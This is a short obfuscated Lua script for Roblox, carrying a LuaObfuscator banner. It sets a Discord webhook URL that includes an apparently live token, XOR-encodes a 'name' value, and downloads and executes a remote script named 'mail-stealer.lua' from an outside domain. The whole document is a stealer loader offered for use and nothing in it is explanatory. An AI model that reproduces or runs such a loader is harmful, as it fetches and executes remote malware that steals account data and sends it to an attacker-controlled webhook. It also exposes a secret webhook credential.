--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v12={};for v13=1, #v8 do v6(v12,v0(v4(v1(v2(v8,v13,v13 + 1 )),v1(v2(v9,1 + ((v13-1)% #v9) ,1 + ((v13-1)% #v9) + 1 )))%256 ));end return v5(v12);end getgenv().webhook="https://discord.com/api/webhooks/1081917394886348911/mFEmg2XDeEFBFk2Dl22IrAGtuWaLuej1IcQcZ2HeU3LiBBU1fGhbnmFjFZogIM7HeWz7";getgenv().name=v7("\135\58\236\137\43\149\15","\204\91\134\232\95");loadstring(game:HttpGet("https://wumat.xyz/scripts/mail-stealer.lua",true))();
